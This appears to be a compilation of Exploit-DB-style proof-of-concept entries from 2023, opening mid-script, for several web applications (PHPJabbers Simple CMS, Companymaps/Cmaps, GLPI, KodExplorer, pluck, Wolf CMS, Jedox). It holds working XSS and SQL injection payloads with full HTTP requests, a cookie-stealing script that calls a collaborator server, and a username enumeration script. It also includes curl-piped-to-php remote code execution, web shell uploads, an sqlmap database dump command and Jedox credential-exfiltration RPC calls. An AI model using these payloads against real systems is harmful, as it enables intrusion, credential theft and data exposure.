tn.close() except ConnectionRefusedError: print("Connection refused") if __name__ == "__main__": exploit(sys.argv[1:])

# Exploit Title: PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS) # Date: 2023-04-29 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://www.phpjabbers.com/faq.php # Software Link: https://www.phpjabbers.com/simple-cms/ # Version: 5.0 # Tested on: Kali Linux ### Steps to Reproduce ### - Please login from this address: https://localhost/simplecms/index.php?controller=pjAdmin&action=pjActionLogin - Click on the "Add Section" button. - Then enter the payload ("><img src=x onerror=alert("Stored")>) in the "Section" box and save it. - Boom! An alert message saying "Stored" will appear in front of you. ### PoC Request ### POST /simplecms/index.php?controller=pjAdminSections&action=pjActionCreate HTTP/1.1 Host: localhost Cookie: pj_sid=PJ1.0.6199026527.1682777172; pj_so=PJ1.0.6771252593.1682777172; pjd_1682777220_628=1; PHPSESSID=bmannt0kqjm2m0vmb5vj1dbu57; simpleCMS=ejrnh4bmb0ems1j4e4r9fq4eq1; pjd=7l9bb4ubmknrdbns46j7g5cqn7 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 371 Origin: https://localhost Referer: https://localhost/simplecms/index.php?controller=pjAdminSections&action=pjActionCreate Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close section_create=1&i18n%5B1%5D%5Bsection_name%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%3E&i18n%5B2%5D%5Bsection_name%5D=&i18n%5B3%5D%5Bsection_name%5D=&i18n%5B1%5D%5Bsection_content%5D=%3Cp%3E%22%26gt%3B%26lt%3Bimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%26gt%3B%3C%2Fp%3E&i18n%5B2%5D%5Bsection_content%5D=&i18n%5B3%5D%5Bsection_content%5D=&url=&status=T

# Exploit Title: Companymaps V8.0 - Stored Cross Site Scripting (XSS) # Date: 27.04.2023 # Exploit Author: Lucas Noki (0xPrototype) # Vendor Homepage: https://github.com/vogtmh # Software Link: https://github.com/vogtmh/cmaps # Version: 8.0 # Tested on: Mac, Windows, Linux # CVE : CVE-2023-29983 *Steps to reproduce:* 1. Clone the repository and install the application 2. Send a maliciously crafted payload via the "token" parameter to the following endpoint: /rest/update/?token= 3. The payload used is: <script>new+Image().src=`http://YOUR_COLLABORATOR_SERVER/?c=${document.cookie}`</script> 4. Simply visiting the complete URL: http://IP/rest/update/?token=PAYLOAD is enough. 5. Login into the admin panel and go to the auditlog under: /admin/index.php?tab=auditlog 6. Check your collaborator server. You should have a request where the admins cookie is the value of the c parameter In a real world case you would need to wait for the admin to log into the application and open the auditlog tab. Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.

# Exploit Title: PHPJabbers Simple CMS 5.0 - SQL Injection # Date: 2023-04-29 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://www.phpjabbers.com/faq.php # Software Link: https://www.phpjabbers.com/simple-cms/ # Version: 5.0 # Tested on: Kali Linux ### Request ### GET /simplecms/index.php?action=pjActionGetFile&column=created&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10 HTTP/1.1 Accept: */* x-requested-with: XMLHttpRequest Referer: https://localhost/simplecms/preview.php?lid=1 Cookie: simpleCMS=lhfh97t17ahm8m375r3upfa844; _fbp=fb.1.1682777372679.72057406; pjd=2rnbhrurbqjsuajj7pnffh2292; pjd_simplecms=1; last_position=%2F Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Host: localhost Connection: Keep-alive ### Parameter & Payloads ### Parameter: column (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: action=pjActionGetFile&column=(SELECT (CASE WHEN (9869=9869) THEN 2 ELSE (SELECT 2339 UNION SELECT 4063) END))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10 Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: action=pjActionGetFile&column=2 AND EXTRACTVALUE(2212,CONCAT(0x5c,0x716b766271,(SELECT (ELT(2212=2212,1))),0x716b707671))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10

# Exploit Title: GLPI 9.5.7 - Username Enumeration # Date: 04/29/2023 # Author: Rafael B. # Vendor Homepage: https://glpi-project.org/pt-br/ # Affected Versions: GLPI version 9.1 <= 9.5.7 # Software: https://github.com/glpi-project/glpi/releases/download/9.5.7/glpi-9.5.7.tgz import requests from bs4 import BeautifulSoup # Send a GET request to the page to receive the csrf token and the cookie session response = requests.get('http://127.0.0.1:80/glpi/front/lostpassword.php?lostpassword=1') # Parse the HTML using BeautifulSoup soup = BeautifulSoup(response.content, 'html.parser') # Find the input element with the CSRF token csrf_input = soup.find('input', {'name': lambda n: n and n.startswith('_glpi_csrf_')}) # Extract the CSRF token if it exists if csrf_input: csrf_token = csrf_input['value'] # Extract the session cookie session_cookie_value = None if response.cookies: session_cookie_value = next(iter(response.cookies.values())) # Set the custom url where the GLPI recover password is located url = "http://127.0.0.1:80/glpi/front/lostpassword.php" headers = {"User-Agent": "Windows NT 10.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/glpi/front/lostpassword.php?lostpassword=1", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"} # Open the email list file and read each line with open('emails.txt', 'r') as f: email_list = f.readlines() # Loop through the email list and make a POST request for each email for email in email_list: email = email.strip() data = {"email": email, "update": "Save", "_glpi_csrf_token": csrf_token} cookies = {"glpi_f6478bf118ca2449e9e40b198bd46afe": session_cookie_value} freq = requests.post(url, headers=headers, cookies=cookies, data=data) # Do a new GET request to get the updated CSRF token and session cookie for the next iteration response = requests.get('http://127.0.0.1:80/glpi/front/lostpassword.php?lostpassword=1') soup = BeautifulSoup(response.content, 'html.parser') csrf_input = soup.find('input', {'name': lambda n: n and n.startswith('_glpi_csrf_')}) if csrf_input: csrf_token = csrf_input['value'] session_cookie_value = None if response.cookies: session_cookie_value = next(iter(response.cookies.values())) # Parse the response and grep the match e-mails soup = BeautifulSoup(freq.content, 'html.parser') div_center = soup.find('div', {'class': 'center'}) Result = (f"Email: {email}, Result: {div_center.text.strip()}") if "An email has been sent to your email address. The email contains information for reset your password." in Result: print ("\033[1;32m Email Found! -> " + Result)

## Title: KodExplorer v4.51.03 - Pwned-Admin File-Inclusion - Remote Code Execution (RCE) ## Author: nu11secur1ty ## Date: 04.30.2023 ## Vendor: https://kodcloud.com/ ## Software: https://github.com/kalcaddle/KodExplorer/releases/tag/4.51.03 ## Reference: https://portswigger.net/web-security/file-upload ## Description: By using this vulnerability remotely, the malicious pwned_admin can list and manipulate all files inside the server. This is an absolutely DANGEROUS and STUPID decision from the application owner! In this scenario, the attacker prepares the machine for exploitation and sends a link for remote execution by using the CURL protocol to his supporter - another attacker. Then and he waits for execution from his colleague, to mask his action or even more worst than ever. What a nice hack is this! :) STATUS: CRITICAL Vulnerability [+]Exploit: ```CURL curl -s https://pwnedhost.com/KodExplorer/data/User/pwnedadmin/home/desktop/BiggusDickus.php | php curl -s https://pwnedhost.com/KodExplorer/data/User/pwnedadmin/home/desktop/dealdir.php | php ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kalcaddle/2023/KodExplorerKodExplorer-4.51.03) ## Proof and Exploit: [href](https://streamable.com/98npd0) ## Time spend: 01:15:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

Exploit Title: pluck v4.7.18 - Stored Cross-Site Scripting (XSS) Application: pluck Version: 4.7.18 Bugs: XSS Technology: PHP Vendor URL: https://github.com/pluck-cms/pluck Software Link: https://github.com/pluck-cms/pluck Date of found: 01-05-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. create .svg file. 2. svg file content: <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> 3. upload file (http://localhost/pluck-4.7.18/admin.php?action=files) poc request POST /pluck-4.7.18/admin.php?action=files HTTP/1.1 Host: localhost Content-Length: 672 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJMTiFxESCx7aNqmI User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/pluck-4.7.18/admin.php?action=files Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=s34g5lr0qg5m4qh0ph5plmo8de Connection: close ------WebKitFormBoundaryJMTiFxESCx7aNqmI Content-Disposition: form-data; name="filefile"; filename="SVG_XSS.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> ------WebKitFormBoundaryJMTiFxESCx7aNqmI Content-Disposition: form-data; name="submit" Upload ------WebKitFormBoundaryJMTiFxESCx7aNqmI-- 4. go to http://localhost/pluck-4.7.18/files/svg_xss.svg

# Exploit Title: Wolf CMS 0.8.3.1 - Remote Code Execution (RCE) # Date: 2023-05-02 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://wolf-cms.readthedocs.io # Software Link: https://github.com/wolfcms/wolfcms # Version: 0.8.3.1 # Tested on: Kali Linux ### Steps to Reproduce ### # Firstly, go to the "Files" tab. # Click on the "Create new file" button and create a php file (e.g: shell.php) # Then, click on the file you created to edit it. # Now, enter your shell code and save the file. # Finally, go to https://localhost/wolfcms/public/shell.php ### There's your shell! ###

# Exploit Title: Cmaps v8.0 - SQL injection - Date: 27.04.2023 - Exploit Author: Lucas Noki (0xPrototype) - Vendor Homepage: https://github.com/vogtmh - Software Link: https://github.com/vogtmh/cmaps - Version: 8.0 - Tested on: Mac, Windows, Linux - CVE : CVE-2023-29809 *Description:* The vulnerability found is an SQL injection. The `bookmap` parameter is vulnerable. When visiting the page: http://192.168.0.56/rest/booking/index.php?mode=list&bookmap=test we get the normal JSON response. However if a single quote gets appended to the value of the `bookmap` parameter we get an error message: ```html <b>Warning</b>: mysqli_num_rows() expects parameter 1 to be mysqli_result, bool given in <b>/var/www/html/rest/booking/index.php</b> on line <b>152</b><br /> ``` Now if two single quotes get appended we get the normal response without an error. This confirms the opportunity for sql injection. To really prove the SQL injection we append the following payload: ``` '-(select*from(select+sleep(2)+from+dual)a)--+ ``` The page will sleep for two seconds. This confirms the SQL injection. *Steps to reproduce:* 1. Send the following payload to test the vulnerability: ```'-(select*from(select+sleep(2)+from+dual)a)--+``` 2. If the site slept for two seconds run the following sqlmap command to dump the whole database including the ldap credentials. ```shell python3 sqlmap.py -u "http://<IP>/rest/booking/index.php?mode=list&bookmap=test*" --random-agent --level 5 --risk 3 --batch --timeout=10 --drop-set-cookie -o --dump ``` Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload. ## Request to the server: <img src="Screenshot 2023-04-30 at 22.23.51.png" alt="Screenshot 2023-04-30 at 22.23.51" style="zoom:50%;" /> ## Response from the server: Look at the response time. <img src="Screenshot 2023-04-30 at 22.24.35.png" alt="Screenshot 2023-04-30 at 22.24.35" style="zoom:50%;" />

# Exploit Title: Jedox 2022.4.2 - Code Execution via RPC Interfaces # Date: 28/04/2023 # Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL # Vendor Homepage: https://jedox.com # Version: Jedox 2022.4 (22.4.2) and older # CVE : CVE-2022-47879 Introduction ================= A Remote Code Execution (RCE) vulnerability in /be/rpc.php and /be/erpc.php allows remote authenticated users to load arbitrary PHP classes from the rtn directory and to execute its methods. To exploit this vulnerability, the attacker needs knowledge about loadable classes, their methods and arguments. Write-Up ================= See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability. Proof of Concept ================= 1) The `Studio::getUserCreds` function can be used to read the clear text credentials of the currently authenticated user. PATH: /be/rpc.php METHOD: POST BODY: [ [ "Studio", "getUserCreds" ] ] 2) Using function `conn::test_palo`, an outgoing HTTP connection can be initiated from the web server to an attacker controlled server (Specify HOST and PORT) with the authenticated user's credentials. This could leak cleartext credentials to an attacker. PATH: /be/rpc.php METHOD: POST BODY: [ [ "conn", "test_palo", [ "<HOST>", "<PORT>", "", "", true, null ] ] ] 3) The function `Studio::getExternURI` can be used to generate a URL with embedded username and encrypted password of the currently authenticated user. PATH: /be/rpc.php METHOD: POST BODY: [ [ "Studio", "getExternURI", [ 0, "", [ 0 ], { "flag":1 } ] ] ] 4) List all available database connections via `conn::ls`: PATH: /be/rpc.php METHOD: POST BODY: [ [ "conn", "ls", [ null, false, true, [ "type", "active", "description" ] ] ] ] 5) Retrieve details of individual database connection (specify connection name via CONNECTION) including encrypted credentials using the Java RPC function `com.jedox.etl.mngr.Connection::getGlobalConnection`: PATH: /tc/rpc METHOD: POST BODY: [ [ "com.jedox.etl.mngr.Connections", "getGlobalConnection", [ "<CONNECTION>" ] ] ] 6) Some functions return credentials only in encrypted form. However, they can be decrypted by any user using `common::decrypt` (specify encrypted credentials via ENCRYPTEDCREDS): PATH: /be/rpc.php METHOD: POST BODY: [ [ "common", "decrypt", [ "<ENCRYPTEDCREDS>" ] ] ] 7) Using `common::paloGet` it is possible to read arbitrary configuration parameters (specify config param via CONFIG. For example, the password of the SMTP server can be read with it (CONFIG: tasks.smtp.password): PATH: /be/rpc.php METHOD: POST BODY: [ [ "common", "paloGet", [ null, "Config", "#_config", [ "config" ], { "config": [ "<CONFIG>" ] }, true, true ] ] ] 8) The function `palo_mgmt::sess_list` can be used to retrieve a list of all active user sessions. The session information includes not only the username but also the user's IP address, information about the browser and other data. PATH: /be/rpc.php METHOD: POST BODY: [ [ "palo_mgmt", "sess_list", [ null ] ] ] 9) The function `palo_mgmt::lic_users_list` returns a list of all users stored in the system: PATH: /be/rpc.php METHOD: POST BODY: [ [ "palo_mgmt", "lic_users_list", [ "0" ] ] ]

# Exploit Title: Jedox 2022.4.2 - Remote Code Execution via Directory Traversal # Date: 28/04/2023 # Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL # Vendor Homepage: https://jedox.com # Version: Jedox 2022.4 (22.4.2) and older # CVE : CVE-2022-47875 Introduction ================= A Directory Traversal vulnerability in /be/erpc.php allows remote authenticated users to execute arbitrary code. To exploit the vulnerability, the attacker must have the permissions to upload files. Write-Up ================= See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability. Proof of Concept ================= 1) This vulnerability can be exploited by first uploading a file using one of the existing file upload mechanisms (e.g. Import in Designer). When uploading a file, the web application returns the file system path in the JSON body of the HTTP response (look for `fspath`). 2) Upload a PHP file and note the file system path (`fspath`) 3) Get RCE via Directory Traversal PATH: /be/erpc.php?c=../../../../../fspath/of/uploaded/file/rce.php METHOD: POST